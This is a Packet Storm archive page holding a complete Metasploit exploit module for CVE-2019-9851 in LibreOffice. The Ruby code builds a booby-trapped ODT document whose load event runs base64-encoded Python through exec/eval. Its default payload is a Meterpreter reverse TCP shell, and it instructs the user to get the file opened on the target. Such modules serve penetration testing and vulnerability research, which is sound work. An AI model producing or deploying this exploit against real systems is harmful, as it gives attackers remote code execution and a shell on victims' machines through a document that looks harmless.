exploit the possibilities

LibreOffice Macro Python Code Execution

LibreOffice Macro Python Code Execution
Posted Aug 20, 2019
Authored by Shelby Pace, LoadLow, Nils Emmerich, Gabriel Masei | Site metasploit.com

This Metasploit module generates an ODT file with a dom loaded event that, when triggered, will execute arbitrary python code and the metasploit payload.

tags | exploit, arbitrary, python
advisories | CVE-2019-9851
MD5 | 6370452257edd14ff2dd490637bb95b3

LibreOffice Macro Python Code Execution

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::FILEFORMAT

def initialize(info = {})
super(update_info(info,
'Name' => 'LibreOffice Macro Python Code Execution',
'Description' => %q{
LibreOffice comes bundled with sample macros written in Python and
allows the ability to bind program events to them.

LibreLogo is a macro that allows a program event to execute text as Python code, allowing RCE.

This module generates an ODT file with a dom loaded event that,
when triggered, will execute arbitrary python code and the metasploit payload.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Nils Emmerich', # Vulnerability discovery and PoC
'Shelby Pace', # Base module author (CVE-2018-16858), module reviewer and platform-independent code
'LoadLow', # This msf module
'Gabriel Masei' # Global events vuln. disclosure
],
'References' =>
[
[ 'CVE', '2019-9851' ],
[ 'URL', 'https://www.libreoffice.org/about-us/security/advisories/cve-2019-9848/' ],
[ 'URL', 'https://www.libreoffice.org/about-us/security/advisories/cve-2019-9851/' ],
[ 'URL', 'https://insinuator.net/2019/07/libreoffice-a-python-interpreter-code-execution-vulnerability-cve-2019-9848/' ]
],
'DisclosureDate' => '2019-07-16',
'Platform' => 'python',
'Arch' => ARCH_PYTHON,
'DefaultOptions' => { 'Payload' => 'python/meterpreter/reverse_tcp' },
'Targets' => [ ['Automatic', {}] ],
'DefaultTarget' => 0
))

register_options(
[
OptString.new('FILENAME', [true, 'Output file name', 'librefile.odt']),
OptString.new('TEXT_CONTENT', [true, 'Text written in the document. It will be html encoded.', 'My Report']),
])
end

def gen_file
text_content = Rex::Text.html_encode(datastore['TEXT_CONTENT'])
py_code = Rex::Text.encode_base64(payload.encoded)
@cmd = "exec(eval(str(__import__('base64').b64decode('#{py_code}'))))"
@cmd = Rex::Text.html_encode(@cmd)

fodt_file = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-9848', 'librefile.erb'))
libre_file = ERB.new(fodt_file).result(binding())

print_status("File generated! Now you need to move the odt file and find a way to send it/open it with LibreOffice on the target.")

libre_file
rescue Errno::ENOENT
fail_with(Failure::NotFound, 'Cannot find template file')
end

def exploit
fodt_file = gen_file

file_create(fodt_file)
end
end
Login or Register to add favorites

File Archive:

October 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    25 Files
  • 2
    Oct 2nd
    13 Files
  • 3
    Oct 3rd
    1 Files
  • 4
    Oct 4th
    1 Files
  • 5
    Oct 5th
    15 Files
  • 6
    Oct 6th
    15 Files
  • 7
    Oct 7th
    15 Files
  • 8
    Oct 8th
    11 Files
  • 9
    Oct 9th
    3 Files
  • 10
    Oct 10th
    1 Files
  • 11
    Oct 11th
    1 Files
  • 12
    Oct 12th
    8 Files
  • 13
    Oct 13th
    12 Files
  • 14
    Oct 14th
    23 Files
  • 15
    Oct 15th
    4 Files
  • 16
    Oct 16th
    13 Files
  • 17
    Oct 17th
    1 Files
  • 18
    Oct 18th
    1 Files
  • 19
    Oct 19th
    27 Files
  • 20
    Oct 20th
    41 Files
  • 21
    Oct 21st
    18 Files
  • 22
    Oct 22nd
    16 Files
  • 23
    Oct 23rd
    2 Files
  • 24
    Oct 24th
    1 Files
  • 25
    Oct 25th
    1 Files
  • 26
    Oct 26th
    17 Files
  • 27
    Oct 27th
    19 Files
  • 28
    Oct 28th
    29 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close